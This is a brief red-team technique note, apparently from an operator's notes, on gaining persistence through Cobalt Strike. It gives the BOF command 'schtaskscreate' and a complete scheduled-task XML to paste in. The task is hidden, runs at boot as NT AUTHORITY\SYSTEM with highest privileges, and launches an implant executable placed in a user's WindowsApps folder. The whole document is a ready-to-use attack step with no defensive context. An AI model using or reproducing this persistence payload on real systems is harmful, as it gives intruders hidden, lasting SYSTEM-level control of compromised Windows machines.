Technique Info

  1. run bof command (cobaltstrike): schtaskscreate \Beacon XML CREATE
  2. paste in:
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
	<Triggers>
		<BootTrigger>
			<Enabled>true</Enabled>
		</BootTrigger>
	</Triggers>
	<Principals>
		<Principal>
			<UserId>NT AUTHORITY\SYSTEM</UserId>
			<RunLevel>HighestAvailable</RunLevel>
		</Principal>
	</Principals>
	<Settings>
		<AllowStartOnDemand>true</AllowStartOnDemand>
		<Enabled>true</Enabled>
		<Hidden>true</Hidden>
	</Settings>
	<Actions>
		<Exec>
			<Command>C:\Users\robb.stark\AppData\Local\Microsoft\WindowsApps\projectapa.exe</Command>
		</Exec>
	</Actions>
</Task>

Related Notes